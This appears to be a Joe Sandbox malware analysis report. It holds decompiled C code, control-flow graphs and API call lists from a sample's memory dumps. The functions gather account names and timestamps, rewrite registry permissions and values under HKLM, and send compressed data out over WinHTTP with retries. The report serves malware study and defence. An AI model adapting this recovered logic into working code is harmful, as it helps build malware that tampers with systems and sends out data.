    • WinHttpCloseHandle.WINHTTP(?), ref: 003B1400
    • WinHttpSetTimeouts.WINHTTP(?,00015F90,00015F90,0002BF20,000927C0), ref: 003B1421
    • WinHttpOpenRequest.WINHTTP(?,?,00000004,00000000,00000000,00000000,?), ref: 003B1458
    • WinHttpSetOption.WINHTTP(00000000,0000001F,00000004,00000004), ref: 003B147A
    • WinHttpSendRequest.WINHTTP(?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 003B148E
    • WinHttpCloseHandle.WINHTTP(?), ref: 003B14B2
    • WinHttpReceiveResponse.WINHTTP(?,00000000), ref: 003B14CF
    • WinHttpQueryHeaders.WINHTTP(?,20000013,00000000,?,00000004,00000000), ref: 003B14EC
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd

    Control-flow Graph

    control_flow_graph 299 395bd0-395c05 300 395c68-395c8c 299->300 301 395c07-395c2a 299->301 305 395ef2-395ef7 300->305 310 395c92-395cb5 300->310 304 395c30-395c3f 301->304 301->305 309 395c42-395c5f LookupAccountSidW 304->309 307 395ef9-395eff call 39bb40 305->307 308 395f02-395f07 305->308 307->308 312 395f09-395f0f 308->312 313 395f17-395f1c 308->313 314 395c61-395c67 309->314 315 395cd5-395cda 309->315 310->305 325 395cbb-395cd0 310->325 312->313 319 395f2d-395f35 313->319 320 395f1e-395f25 313->320 317 395cdc-395ce1 315->317 318 395d37-395d3a 315->318 317->318 322 395ce3-395d33 call 3a1d90 memcpy * 2 317->322 323 395d3c-395d3e 318->323 324 395d40 318->324 320->319 322->318 327 395d42-395d79 call 391c70 call 3a1d90 call 399090 * 2 323->327 324->327 325->309 337 395d7b-395d91 call 399090 327->337 338 395daf-395df2 call 399090 * 2 _time64 _localtime64 call 399090 327->338 344 395d93-395da2 337->344 345 395da4-395dac call 399090 337->345 350 395df7-395e1e wcsftime 338->350 344->344 344->345 345->338 351 395e20 350->351 352 395e34-395e4d call 399090 350->352 353 395e23-395e32 351->353 356 395e4f 352->356 357 395e61-395e65 352->357 353->352 353->353 358 395e50-395e5f 356->358 359 395e9f-395ebf call 399090 call 398030 357->359 360 395e67-395e7d call 399090 357->360 358->357 358->358 372 395ec1-395ed0 359->372 373 395ed2-395ef0 call 399090 call 39bb40 359->373 365 395e7f 360->365 366 395e91-395e9c call 399090 360->366 368 395e80-395e8f 365->368 366->359 368->366 368->368 372->372 372->373 373->305
    C-Code - Quality: 69%
    			E00395BD0(intOrPtr* _a4, signed int _a8) {
    				long _v8;
    				signed int _v12;
    				short _v16;
    				char _v20;
    				void* _v24;
    				signed short* _v28;
    				char _v32;
    				signed short* _v36;
    				char _v44;
    				tm* _v48;
    				char _v52;
    				intOrPtr _v56;
    				char _v60;
    				void* _v120;
    				void* _v196;
    				void _v708;
    				void _v1220;
    				long _v1732;
    				intOrPtr _t98;
    				signed int _t99;
    				signed short* _t100;
    				void* _t101;
    				intOrPtr _t102;
    				intOrPtr _t106;
    				signed int _t111;
    				void* _t113;
    				int _t114;
    				intOrPtr _t116;
    				signed int _t117;
    				signed int _t120;
    				tm* _t121;
    				signed short _t125;
    				signed int _t126;
    				signed int _t127;
    				signed int _t131;
    				signed int _t135;
    				signed int _t136;
    				signed int _t137;
    				signed int _t139;
    				signed int _t141;
    				void* _t154;
    				intOrPtr _t155;
    				long _t162;
    				signed short* _t165;
    				signed short* _t166;
    				void* _t168;
    				void* _t169;
    				intOrPtr _t177;
    				intOrPtr _t179;
    				intOrPtr _t190;
    				WCHAR* _t192;
    				wchar_t* _t193;
    				signed short* _t194;
    				void* _t195;
    				intOrPtr _t196;
    				void* _t197;
    				void* _t198;
    				void* _t199;
    				signed int* _t200;
    				signed int* _t201;
    				signed int* _t202;
    				signed int* _t203;
    				signed int* _t204;
    				short* _t205;
    				void* _t206;
    				void* _t207;
    				void* _t208;
    				void* _t211;
    				void* _t213;
    				void* _t214;
    				void* _t215;
    				void* _t216;
    
    				_t192 = 0;
    				_t195 = 0;
    				_t154 = 0;
    				_v32 = 0;
    				_v60 = 0;
    				_v20 = 0;
    				_v16 = 0x500;
    				_v24 = 0;
    				_v28 = 0;
    				_v8 = 0x200;
    				_v12 = 0x200;
    				if(_a8 == 0) {
    					_t155 =  *0x3b8628; // 0x593938
    					_t98 =  *0x3b8628; // 0x593938
    					_t99 =  *((intOrPtr*)( *((intOrPtr*)(_t98 + 0x150))))( *((intOrPtr*)( *((intOrPtr*)(_t155 + 0x100))))(8,  &_v32));
    					__eflags = _t99;
    					if(_t99 == 0) {
    						goto L32;
    					} else {
    						_t179 =  *0x3b8628; // 0x593938
    						_t111 =  *((intOrPtr*)( *((intOrPtr*)(_t179 + 0x13c))))(_v32, 1,  &_v196, 0x4c,  &_v60);
    						__eflags = _t111;
    						if(_t111 == 0) {
    							goto L32;
    						} else {
    							_push( &_v52);
    							_push( &_v12);
    							_push( &_v708);
    							_t113 = _v196;
    							goto L3;
    						}
    					}
    				} else {
    					_t190 =  *0x3b8628; // 0x593938
    					_push( &_v24);
    					_push(0);
    					_push(0);
    					_push(0);
    					_push(0);
    					_push(0);
    					_push(0);
    					_push(0);
    					_push(0x12);
    					_push(1);
    					_push( &_v20);
    					if( *((intOrPtr*)( *((intOrPtr*)(_t190 + 0x158))))() == 0) {
    						L32:
    						_t100 = _v28;
    						__eflags = _t100 - _t192;
    						if(_t100 != _t192) {
    							E0039BB40(_t100);
    						}
    						_t101 = _v24;
    						__eflags = _t101 - _t192;
    						if(_t101 != _t192) {
    							_t106 =  *0x3b8628; // 0x593938
    							 *((intOrPtr*)( *((intOrPtr*)(_t106 + 0x154))))(_t101);
    						}
    						_t102 = _v32;
    						__eflags = _t102 - _t192;
    						if(_t102 != _t192) {
    							_t177 =  *0x3b8628; // 0x593938
    							 *((intOrPtr*)( *((intOrPtr*)(_t177 + 0xf8))))(_t102);
    						}
    						return _t195;
    					} else {
    						_push( &_v52);
    						_push( &_v12);
    						_push( &_v708);
    						_t113 = _v24;
    						L3:
    						_t114 = LookupAccountSidW(_t192, _t113,  &_v1220,  &_v8, ??, ??, ??); // executed
    						if(_t114 != 0) {
    							_t162 = _v8;
    							__eflags = _t162 - _t192;
    							if(_t162 > _t192) {
    								_t141 = _v12;
    								__eflags = _t141 - _t192;
    								if(_t141 > _t192) {
    									_t154 = E003A1D90(_t141 + _t162 + _t141 + _t162 + 4, _t192);
    									memcpy(_t154,  &_v708, _v12 + _v12);
    									_t205 = _t154 + _v12 * 2;
    									 *_t205 = 0x5c;
    									_t206 = _t205 + 2;
    									memcpy(_t206,  &_v1220, _v8 + _v8);
    									_t208 = _t208 + 0x20;
    									__eflags = 0;
    									 *((short*)(_t206 + _v8 * 2)) = 0;
    								}
    							}
    							__eflags = _a8 - _t192;
    							if(__eflags == 0) {
    								_push(0x1e);
    							} else {
    								_push(0x1d);
    							}
    							_v36 = E00391C70(__eflags);
    							_t116 = E003A1D90(0x7d00, _t192); // executed
    							_t196 = _t116;
    							_v56 = _t196;
    							_t117 = E00399090(__eflags, _t196, 0x16);
    							_t211 = _t208 + 0x14;
    							_t197 = _t196 + _t117 * 2;
    							_t198 = _t197 + E00399090(__eflags, _t197, 0x1b) * 2;
    							__eflags = _a8 - _t192;
    							if(__eflags == 0) {
    								_t204 = _t198 + E00399090(__eflags, _t198, 0x1f) * 2;
    								_t139 =  *_t154 & 0x0000ffff;
    								_t211 = _t211 + 0x10;
    								_t169 = _t154;
    								__eflags = _t139 - _t192;
    								while(__eflags != 0) {
    									_t169 = _t169 + 2;
    									 *_t204 = _t139;
    									_t139 =  *_t169 & 0x0000ffff;
    									_t204 =  &(_t204[0]);
    									__eflags = _t139 - _t192;
    								}
    								_t198 = _t204 + E00399090(__eflags, _t204, 0x20) * 2;
    							}
    							_t199 = _t198 + E00399090(__eflags, _t198, 0x1c) * 2;
    							_t120 = E00399090(__eflags, _t199, 0x17);
    							_t200 = _t199 + _t120 * 2;
    							__imp___time64( &_v44);
    							_v44 = _v44 + 0x3c;
    							_t121 =  &_v44;
    							asm("adc [ebp-0x24], edi"); // executed
    							__imp___localtime64(_t121); // executed
    							_v48 = _t121;
    							_t193 =  &_v120;
    							E00399090(__eflags,  &_v1732, 0x21);
    							 *((short*)(_t207 + wcsftime(_t193, 0x1a,  &_v1732, _v48) * 2 - 0x74)) = 0;
    							_t125 = _v120;
    							_t213 = _t211 + 0x38;
    							__eflags = _t125;
    							if(__eflags != 0) {
    								_t137 = _t125 & 0x0000ffff;
    								do {
    									_t193 =  &(_t193[0]);
    									 *_t200 = _t137;
    									_t137 =  *_t193 & 0x0000ffff;
    									_t200 =  &(_t200[0]);
    									__eflags = _t137;
    								} while (__eflags != 0);
    							}
    							_t126 = E00399090(__eflags, _t200, 0x18);
    							_t194 = _v36;
    							_t201 = _t200 + _t126 * 2;
    							_t127 =  *_t194 & 0x0000ffff;
    							_t214 = _t213 + 8;
    							_t165 = _t194;
    							__eflags = _t127;
    							while(_t127 != 0) {
    								_t165 =  &(_t165[1]);
    								 *_t201 = _t127;
    								_t127 =  *_t165 & 0x0000ffff;
    								_t201 =  &(_t201[0]);
    								__eflags = _t127;
    							}
    							__eflags = _a8;
    							if(__eflags == 0) {
    								_t203 = _t201 + E00399090(__eflags, _t201, 0x1f) * 2;
    								_t135 =  *_t154 & 0x0000ffff;
    								_t216 = _t214 + 8;
    								_t168 = _t154;
    								__eflags = _t135;
    								while(__eflags != 0) {
    									_t168 = _t168 + 2;
    									 *_t203 = _t135;
    									_t135 =  *_t168 & 0x0000ffff;
    									_t203 =  &(_t203[0]);
    									__eflags = _t135;
    								}
    								_t136 = E00399090(__eflags, _t203, 0x20);
    								_t214 = _t216 + 8;
    								_t201 = _t203 + _t136 * 2;
    							}
    							_t202 = _t201 + E00399090(__eflags, _t201, 0x19) * 2;
    							E00398030( &_v28);
    							_t166 = _v28;
    							_t131 =  *_t166 & 0x0000ffff;
    							_t215 = _t214 + 0xc;
    							__eflags = _t131;
    							while(__eflags != 0) {
    								_t166 =  &(_t166[1]);
    								 *_t202 = _t131;
    								_t131 =  *_t166 & 0x0000ffff;
    								_t202 =  &(_t202[0]);
    								__eflags = _t131;
    							}
    							E00399090(__eflags, _t202, 0x1a);
    							 *_a4 = _v56;
    							_t195 = 1;
    							E0039BB40(_t194);
    							_t208 = _t215 + 0xc;
    							_t192 = 0;
    							__eflags = 0;
    							goto L32;
    						} else {
    							return _t114;
    						}
    					}
    				}
    			}

    APIs
    • LookupAccountSidW.ADVAPI32(00000000,?,?,00000001,?,?,?), ref: 00395C5B
    • memcpy.MSVCRT ref: 00395D01
    • memcpy.MSVCRT ref: 00395D26
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
    • _time64.MSVCRT ref: 00395DCC
    • _localtime64.MSVCRT ref: 00395DDD
    • wcsftime.MSVCRT ref: 00395E07
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 378 3b0640-3b0655 379 3b065c-3b068c StrChrW RegOpenKeyExW 378->379 380 3b0657 378->380 381 3b0782-3b0787 379->381 382 3b0692-3b06b3 GetSecurityInfo 379->382 380->379 383 3b06b9-3b06f5 call 3980a0 StrChrW RegOpenKeyExW 382->383 384 3b076e-3b0780 382->384 388 3b0718-3b0738 SetNamedSecurityInfoW 383->388 389 3b06f7-3b0716 RegSetValueExW 383->389 384->381 390 3b073a-3b075a 388->390 391 3b075c-3b076b 388->391 389->388 390->391 391->384
    C-Code - Quality: 100%
    			E003B0640(WCHAR* __ebx, short* _a4, char _a8) {
    				void* _v8;
    				void* _v12;
    				char _v16;
    				long _t30;
    				intOrPtr _t31;
    				int _t32;
    				char _t40;
    				intOrPtr _t41;
    				int _t42;
    				WCHAR* _t50;
    				intOrPtr _t54;
    				intOrPtr _t57;
    				intOrPtr _t58;
    				int _t73;
    				signed int _t74;
    
    				_t50 = __ebx;
    				_t74 = 0;
    				_v12 = 0;
    				_v8 = 0;
    				if(_a8 != 0) {
    					_t74 = 0x100;
    				}
    				_t30 = RegOpenKeyExW(0x80000002,  &((StrChrW(_t50, 0x5c))[1]), 0, _t74 | 0x00020019,  &_v12); // executed
    				if(_t30 == 0) {
    					_t31 =  *0x3b8628; // 0x593938
    					_t32 =  *((intOrPtr*)( *((intOrPtr*)(_t31 + 0x1ac))))(_v12, 4, 4, _t30, _t30,  &_a8, _t30, _t30); // executed
    					_t73 = _t32;
    					if(_t73 == 0) {
    						E003980A0(_v12, 4); // executed
    						_t40 = RegOpenKeyExW(0x80000002,  &((StrChrW(_t50, 0x5c))[1]), _t73, _t74 | 0x0002001f,  &_v8); // executed
    						if(_t40 == 0) {
    							_v16 = _t40;
    							RegSetValueExW(_v8, _a4, _t73, 4,  &_v16, 4); // executed
    						}
    						_t41 =  *0x3b8628; // 0x593938
    						_t42 =  *((intOrPtr*)( *((intOrPtr*)(_t41 + 0x1a4))))(_t50, 4, 4, 0, 0, _a8, 0); // executed
    						_t73 = _t42;
    						if(_t73 != 0) {
    							_t58 =  *0x3b8628; // 0x593938
    							_t73 =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0x1a8))))(_v8, 4, 4, 0, 0, _a8, 0);
    						}
    						_t57 =  *0x3b8628; // 0x593938
    						 *((intOrPtr*)( *((intOrPtr*)(_t57 + 0x198))))(_v8);
    					}
    					_t54 =  *0x3b8628; // 0x593938
    					 *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x198))))(_v12);
    					return _t73;
    				}
    				return _t30;
    			}

    APIs
    • StrChrW.SHLWAPI(?,0000005C), ref: 003B0673
    • RegOpenKeyExW.KERNEL32(80000002,-00000002), ref: 003B0688
    • GetSecurityInfo.ADVAPI32(?,00000004,00000004,00000000,00000000,00000000,00000000,00000000), ref: 003B06AD
      • Part of subcall function 003980A0: memset.MSVCRT ref: 00398128
      • Part of subcall function 003980A0: SetSecurityInfo.ADVAPI32(?,?,00000004,00000000,00000000,?,00000000), ref: 003981A5
    • StrChrW.SHLWAPI(?,0000005C), ref: 003B06D6
    • RegOpenKeyExW.KERNEL32(80000002,-00000002), ref: 003B06F1
    • RegSetValueExW.KERNEL32(?,?,00000000,00000004,?,00000004), ref: 003B0716
    • SetNamedSecurityInfoW.ADVAPI32(?,00000004,00000004,00000000,00000000,?,00000000), ref: 003B0732
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 393 3944b0-394501 call 395000 398 39453f-394545 393->398 399 394503-394506 393->399 400 39454b-394553 398->400 401 394600-394616 398->401 399->398 402 394508-394533 call 399090 399->402 400->401 404 394559-394582 call 3a1d90 * 2 400->404 409 394618-394624 401->409 410 39468d 401->410 402->398 416 394535 402->416 404->401 420 394584-394586 404->420 414 39468a 409->414 415 394626-394639 409->415 412 394694-3946a9 410->412 425 3946af-3946b2 412->425 426 3947c3 412->426 414->410 418 394640-394648 415->418 416->398 421 39464a-394650 418->421 422 394660-394662 418->422 420->401 427 394588-3945c3 call 395970 call 397600 420->427 421->422 428 394652-39465c 421->428 423 39466c-394673 422->423 424 394664-394667 422->424 423->414 430 394675-394688 423->430 424->423 431 3946b4-3946c7 call 3b1280 425->431 432 3947c6-3947c8 426->432 448 3945e2-3945f1 call 39bb40 * 2 427->448 449 3945c5-3945df 427->449 428->418 429 39465e 428->429 429->424 430->412 445 3946c9-3946d3 ??2@YAPAXI@Z 431->445 446 3946de-3946e8 ??2@YAPAXI@Z 431->446 432->401 435 3947ce-3947d4 432->435 437 3947df-3947e4 435->437 438 3947d6-3947dc call 39bb40 435->438 443 3947ef-3947f4 437->443 444 3947e6-3947ec call 39bb40 437->444 438->437 453 3947ff-394804 443->453 454 3947f6-3947fc call 39bb40 443->454 444->443 451 3946f3 445->451 455 3946d5-3946dc call 3b1dc0 445->455 450 3946ea-3946ec call 3b1d30 446->450 446->451 448->401 449->448 468 3946f1 450->468 460 3946f5-39470b 451->460 462 39480f-394814 453->462 463 394806-39480c call 39bb40 453->463 454->453 455->460 479 394718-39471e 460->479 480 39470d-394711 460->480 464 39481f-394835 call 39bb40 462->464 465 394816-39481c call 39bb40 462->465 463->462 481 394840-394871 464->481 482 394837-39483d ??3@YAXPAX@Z 464->482 465->464 468->460 484 394771-39477e 479->484 485 394720 479->485 480->431 483 394713-394716 480->483 482->481 483->484 484->435 486 394780-394798 484->486 487 394722-394740 call 3990f0 485->487 489 39479a-3947ad 486->489 490 
3947af-3947c1 Sleep 486->490 492 394745-394747 487->492 489->432 490->432 493 394749-394760 492->493 494 394767 492->494 493->487 499 394762-394765 493->499 497 39476e 494->497 497->484 499->497
    C-Code - Quality: 91%
    			E003944B0(void* __edi, void* __esi, void* __eflags, intOrPtr* _a4) {
    				char _v8;
    				signed int _v12;
    				signed int _v16;
    				intOrPtr* _v20;
    				char _v28;
    				signed int _v32;
    				char _v1056;
    				void* __ebx;
    				intOrPtr _t90;
    				intOrPtr _t92;
    				intOrPtr _t94;
    				intOrPtr _t96;
    				intOrPtr _t104;
    				intOrPtr* _t114;
    				intOrPtr* _t115;
    				intOrPtr* _t129;
    				intOrPtr _t131;
    				signed int* _t132;
    				unsigned int _t134;
    				void* _t137;
    				void* _t141;
    				intOrPtr _t147;
    				void* _t149;
    				intOrPtr* _t150;
    				intOrPtr _t151;
    				intOrPtr _t158;
    				signed int _t162;
    				intOrPtr _t165;
    				intOrPtr _t169;
    				signed int _t172;
    				signed short* _t173;
    				signed int _t180;
    				intOrPtr _t181;
    				intOrPtr _t185;
    				signed int _t193;
    				void* _t204;
    				signed int _t205;
    				void* _t207;
    				void* _t209;
    				intOrPtr _t210;
    				intOrPtr _t212;
    				intOrPtr* _t213;
    				intOrPtr* _t214;
    				void* _t215;
    				void* _t216;
    				void* _t219;
    
    				_t209 = __esi;
    				_t204 = __edi;
    				E00395000( &_v28);
    				_t90 =  *0x3b8628; // 0x593938
    				_v16 = 0;
    				 *((intOrPtr*)( *((intOrPtr*)(_t90 + 0xac))))(0x3b8594, _t149);
    				_t92 =  *0x3b8628; // 0x593938
    				_t180 =  *0x3b857c; // 0x1
    				_v12 = _t180;
    				 *((intOrPtr*)( *((intOrPtr*)(_t92 + 0xc4))))(0x3b8594);
    				_t181 =  *0x3b8584; // 0x1
    				_t150 = _a4;
    				if(_t181 == 0) {
    					_t222 =  *((intOrPtr*)(_t150 + 4)) - _t181;
    					if( *((intOrPtr*)(_t150 + 4)) != _t181) {
    						E00399090(_t222,  &_v1056, 0xb);
    						_t147 =  *0x3b8628; // 0x593938
    						_t215 = _t215 + 8;
    						_push( &_v1056);
    						_push( *((intOrPtr*)(_t150 + 4)));
    						if( *((intOrPtr*)( *((intOrPtr*)(_t147 + 0xe0))))() == 0) {
    							 *0x3b8584 = 1;
    						}
    					}
    				}
    				_push(_t209);
    				_push(_t204);
    				if( *((intOrPtr*)(_t150 + 0x10)) != 0) {
    					_t134 =  *(_t150 + 0x14);
    					if(_t134 >= 0x100000) {
    						_v8 = (_t134 >> 4) + _t134 + 0x4c;
    						_t214 = E003A1D90((_t134 >> 4) + _t134 + 0x4c, 0);
    						_t137 = E003A1D90(0x10000, 0);
    						_t208 = _t137;
    						_t215 = _t215 + 0x10;
    						if(_t137 != 0 && _t214 != 0) {
    							_push(4);
    							E00395970(_t137, 0x1040, 2, 4, 4, 4, 4, 4, 4, 4);
    							_v8 = _v8 - 8;
    							_t22 = _t214 + 8; // 0x8
    							_t141 = E00397600(_t22,  *((intOrPtr*)(_t150 + 0x10)),  *(_t150 + 0x14), _t22,  &_v8, _t208);
    							_t219 = _t215 + 0x3c;
    							if(_t141 == 0) {
    								 *_t214 = 0x4150495a;
    								 *(_t214 + 4) =  *(_t150 + 0x14);
    								 *((intOrPtr*)(_t150 + 0x10)) = _t214;
    								_t214 =  *((intOrPtr*)(_t150 + 0x10));
    								 *(_t150 + 0x14) = _v8 + 8;
    							}
    							E0039BB40(_t214);
    							E0039BB40(_t208);
    							_t215 = _t219 + 8;
    						}
    					}
    				}
    				do {
    					_t94 =  *0x3b8628; // 0x593938
    					 *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xac))))(0x3b8594);
    					if(_v12 < 0) {
    						L23:
    						_v12 = 0xffffffff;
    						L24:
    						_t96 =  *0x3b8628; // 0x593938
    						 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0xc4))))(0x3b8594);
    						_t50 =  &_v12;
    						 *_t50 = _v12 + 1;
    						if( *_t50 == 0) {
    							_t210 = _v8;
    							goto L47;
    						}
    						_t205 = _v32;
    						_t210 = 0;
    						do {
    							_t114 = E003B1280(0,  &_v1056);
    							_t216 = _t215 + 4;
    							_push(0x1c);
    							if(_t114 == 0) {
    								L0039A47E();
    								_t215 = _t216 + 4;
    								__eflags = _t114;
    								if(_t114 == 0) {
    									L31:
    									_t115 = 0;
    									__eflags = 0;
    									L32:
    									_v20 = _t115;
    									_push(_t205);
    									_push( &_v1056);
    									if( *((intOrPtr*)( *((intOrPtr*)( *_t115 + 8))))() != 0) {
    										_v8 = _t210;
    										__eflags = _t210 - 5;
    										if(__eflags >= 0) {
    											L42:
    											_t162 = _v16 + 1;
    											_v16 = _t162;
    											if(_t162 > 0x4b0) {
    												goto L48;
    											}
    											if(_t162 != (0x66666667 * _t162 >> 0x20 >> 2 >> 0x1f) + (0x66666667 * _t162 >> 0x20 >> 2) + ((0x66666667 * _t162 >> 0x20 >> 2 >> 0x1f) + (0x66666667 * _t162 >> 0x20 >> 2)) * 4 + (0x66666667 * _t162 >> 0x20 >> 2 >> 0x1f) + (0x66666667 * _t162 >> 0x20 >> 2) + ((0x66666667 * _t162 >> 0x20 >> 2 >> 0x1f) + (0x66666667 * _t162 >> 0x20 >> 2)) * 4) {
    												Sleep(0x3e8); // executed
    											} else {
    												_t165 =  *0x3b8628; // 0x593938
    												 *((intOrPtr*)( *((intOrPtr*)(_t165 + 0xc8))))(0xea60);
    											}
    											goto L47;
    										}
    										_t212 = 0;
    										__eflags = 0;
    										while(1) {
    											_t129 = E003990F0(_t150,  *((intOrPtr*)(_t150 + 0x18)), _t205, _t212,  &_v28,  *_t150,  *((intOrPtr*)(_t150 + 4)),  *((intOrPtr*)(_t150 + 8)),  *((intOrPtr*)(_t150 + 0xc)),  *((intOrPtr*)(_t150 + 0x10)),  *(_t150 + 0x14)); // executed
    											__eflags = _t129;
    											if(__eflags != 0) {
    												break;
    											}
    											_t169 =  *0x3b8628; // 0x593938
    											 *((intOrPtr*)( *((intOrPtr*)(_t169 + 0xc8))))(0x3e8);
    											_t212 = _t212 + 1;
    											__eflags = _t212 - 3;
    											if(__eflags < 0) {
    												continue;
    											}
    											_v8 = _t212;
    											L41:
    											_t210 = _v8;
    											goto L42;
    										}
    										_v8 = 0;
    										goto L41;
    									}
    									goto L33;
    								}
    								_t115 = E003B1D30(_t114); // executed
    								goto L32;
    							}
    							L0039A47E();
    							_t215 = _t216 + 4;
    							if(_t114 == 0) {
    								goto L31;
    							}
    							_t115 = L003B1DC0(_t114);
    							goto L32;
    							L33:
    							_t210 = _t210 + 1;
    						} while (_t210 < 5);
    						_v8 = _t210;
    						goto L42;
    					}
    					_t151 =  *((intOrPtr*)(_t150 + 0x18));
    					_t131 =  *((intOrPtr*)(_t151 + 8));
    					_t172 = _v12;
    					if(_t172 >=  *((intOrPtr*)(_t131 + 0x18))) {
    						L22:
    						_t150 = _a4;
    						goto L23;
    					}
    					_t173 =  *( *((intOrPtr*)(_t131 + 0x1c)) + _t172 * 4);
    					_t213 = 0x200;
    					_t132 =  &_v1056;
    					_t207 = 0;
    					while(1) {
    						_t39 = _t213 + 0x7ffffdfe; // 0x7ffffffe
    						if(_t39 == 0) {
    							break;
    						}
    						_t193 =  *_t173 & 0x0000ffff;
    						if(_t193 == 0) {
    							break;
    						}
    						 *_t132 = _t193;
    						_t132 =  &(_t132[0]);
    						_t173 =  &(_t173[1]);
    						_t213 = _t213 - 1;
    						if(_t213 != 0) {
    							continue;
    						}
    						L19:
    						_t132 = _t132 - 2;
    						_t207 = 0x8007007a;
    						L20:
    						 *_t132 = 0;
    						if(_t207 < 0) {
    							goto L22;
    						}
    						_t150 = _a4;
    						_v32 =  *( *((intOrPtr*)( *((intOrPtr*)(_t151 + 8)) + 0x20)) + _v12 * 4) & 0x0000ffff;
    						goto L24;
    					}
    					__eflags = _t213;
    					if(__eflags != 0) {
    						goto L20;
    					}
    					goto L19;
    					L47:
    				} while (_t210 > 0);
    				L48:
    				_t98 =  *_t150;
    				if( *_t150 != 0) {
    					E0039BB40(_t98);
    					_t215 = _t215 + 4;
    				}
    				_t99 =  *((intOrPtr*)(_t150 + 4));
    				if( *((intOrPtr*)(_t150 + 4)) != 0) {
    					E0039BB40(_t99);
    					_t215 = _t215 + 4;
    				}
    				_t100 =  *((intOrPtr*)(_t150 + 8));
    				if( *((intOrPtr*)(_t150 + 8)) != 0) {
    					E0039BB40(_t100);
    					_t215 = _t215 + 4;
    				}
    				_t101 =  *((intOrPtr*)(_t150 + 0x10));
    				if( *((intOrPtr*)(_t150 + 0x10)) != 0) {
    					E0039BB40(_t101);
    					_t215 = _t215 + 4;
    				}
    				_t102 =  *((intOrPtr*)(_t150 + 0xc));
    				if( *((intOrPtr*)(_t150 + 0xc)) != 0) {
    					E0039BB40(_t102);
    					_t215 = _t215 + 4;
    				}
    				E0039BB40(_t150);
    				_t104 = _v20;
    				_v28 = 0x3b32ec;
    				if(_t104 != 0) {
    					_push(_t104);
    					L00391CB0();
    				}
    				_t185 =  *0x3b8628; // 0x593938
    				 *((intOrPtr*)( *((intOrPtr*)(_t185 + 0xac))))(0x3b8600);
    				_t158 =  *0x3b8628; // 0x593938
    				 *0x3b8618 =  *0x3b8618 - 1;
    				 *((intOrPtr*)( *((intOrPtr*)(_t158 + 0xc4))))(0x3b8600);
    				return 0;
    			}

    APIs
    • ??2@YAPAXI@Z.MSVCRT ref: 003946C9
    • ??2@YAPAXI@Z.MSVCRT ref: 003946DE
    • ??3@YAXPAX@Z.MSVCRT ref: 00394838
      • Part of subcall function 003B1D30: WinHttpOpen.WINHTTP(?,00000000,00000000,00000000,00000000,00000000,?), ref: 003B1D73
    • Sleep.KERNELBASE(000003E8), ref: 003947BF
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
      • Part of subcall function 00397600: memset.MSVCRT ref: 00397698
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
